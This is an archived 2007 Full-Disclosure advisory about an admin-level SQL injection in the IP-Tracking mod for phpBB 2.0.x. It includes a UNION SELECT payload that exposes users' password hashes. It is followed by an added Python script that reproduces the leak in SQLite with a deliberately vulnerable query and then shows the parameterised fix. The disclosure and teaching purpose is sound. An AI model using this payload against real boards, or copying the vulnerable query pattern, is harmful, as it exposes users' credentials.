full-disclosure-uk May 2007 archive

[Full-disclosure] SQL-Injection in IP-TRACKING Mod for phpBB2.0.x

From: Cornelius Riemenschneider <c.r1_at_nospam>
Date: Sun May 20 2007 - 17:48:06 GMT
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk

Information: The IP-Tracking Mod is an extension for phpBB 2.0.x which logs all page hits made by the board's users, including referer, IP and username. It contains an SQL injection at admin level. You can get it from:

Steps to reproduce: Go into your ACP, under IP-Tracking select IP-Search, select "no" at "use wildcards" and enter whatever you want in Search Query. It is passed directly into the query. As Search Type I used IP.

PoC: enter

' UNION SELECT user_password as ip,user_id,username,user_active,user_regdate,user_level,user_posts from phpbb_users#

as Search Query. This will display all the hashed user passwords in the IP column.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
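The injection described in the post, reproduced against a throwaway SQLite database and then closed with a bound parameter. This is an added example, not code from the IP-Tracking mod or from phpBB: the tracking table's column list and the exact shape of the mod's "no wildcards" IP search (`WHERE ip = '<search>'`) are assumptions, chosen so the seven-column UNION from the PoC lines up. SQLite has no `#` line comment, so the payload ends in `-- ` instead of the MySQL `#` the original PoC uses; the sample users and hits are constructed, and the hashes are unsalted MD5 as phpBB 2.0.x stored them.

```python
"""Reproduce the advisory's UNION injection in SQLite and show the fix.

Added example, not the mod's or phpBB's own code.  The phpbb_ip_tracking
schema and the search query shape are assumptions.  The payload uses the
SQLite comment marker '-- ' where the original PoC used MySQL's '#'.
"""
import hashlib
import sqlite3

# Constructed sample data, not from the original page.
SAMPLE_USERS = [
    # user_id, username, plaintext (only used to derive the hash), active, regdate, level, posts
    (2, "admin", "admin-secret", 1, 1179000000, 1, 42),
    (3, "alice", "alice-pw", 1, 1179100000, 0, 7),
]
SAMPLE_HITS = [
    # ip, user_id, username, user_active, user_regdate, user_level, user_posts
    ("10.0.0.1", 3, "alice", 1, 1179100000, 0, 7),
    ("192.0.2.5", 2, "admin", 1, 1179000000, 1, 42),
]

# Assumed column list of the mod's search result; seven columns, as in the PoC.
COLUMNS = "ip,user_id,username,user_active,user_regdate,user_level,user_posts"

# The advisory's payload, with the trailing comment adapted for SQLite.
PAYLOAD = (
    "' UNION SELECT user_password as ip,user_id,username,user_active,"
    "user_regdate,user_level,user_posts from phpbb_users -- "
)


def md5_hex(plaintext: str) -> str:
    """phpBB 2.0.x password hash: plain MD5, no salt."""
    return hashlib.md5(plaintext.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """In-memory database holding the two tables the PoC touches."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE phpbb_users (
            user_id INTEGER PRIMARY KEY, username TEXT, user_password TEXT,
            user_active INTEGER, user_regdate INTEGER, user_level INTEGER,
            user_posts INTEGER);
        CREATE TABLE phpbb_ip_tracking (
            ip TEXT, user_id INTEGER, username TEXT, user_active INTEGER,
            user_regdate INTEGER, user_level INTEGER, user_posts INTEGER);
        """
    )
    conn.executemany(
        "INSERT INTO phpbb_users VALUES (?,?,?,?,?,?,?)",
        [(uid, name, md5_hex(pw), act, reg, lvl, posts)
         for uid, name, pw, act, reg, lvl, posts in SAMPLE_USERS],
    )
    conn.executemany("INSERT INTO phpbb_ip_tracking VALUES (?,?,?,?,?,?,?)", SAMPLE_HITS)
    return conn


def vulnerable_search(conn: sqlite3.Connection, search: str) -> list:
    """Assumed shape of the mod's search with wildcards off: the admin-supplied
    string is spliced straight into the WHERE clause, so a quote breaks out
    of the literal and the UNION appends rows from phpbb_users."""
    sql = f"SELECT {COLUMNS} FROM phpbb_ip_tracking WHERE ip = '{search}'"
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, search: str) -> list:
    """Same query with a bound parameter: the payload is compared as a literal
    IP string and simply matches nothing."""
    sql = f"SELECT {COLUMNS} FROM phpbb_ip_tracking WHERE ip = ?"
    return conn.execute(sql, (search,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal search:  ", vulnerable_search(db, "10.0.0.1"))
    print("injected search:", vulnerable_search(db, PAYLOAD))
    print("parameterised:  ", safe_search(db, PAYLOAD))
```

Running it prints the one tracking row for 10.0.0.1, then the two MD5 password hashes sitting in the `ip` column of the injected result, then an empty list for the parameterised version. The `#` versus `-- ` difference matters in practice: MySQL accepts both, so an attacker need not care, but a reproduction against another engine must use that engine's comment syntax or the dangling quote after the payload causes a syntax error rather than a leak.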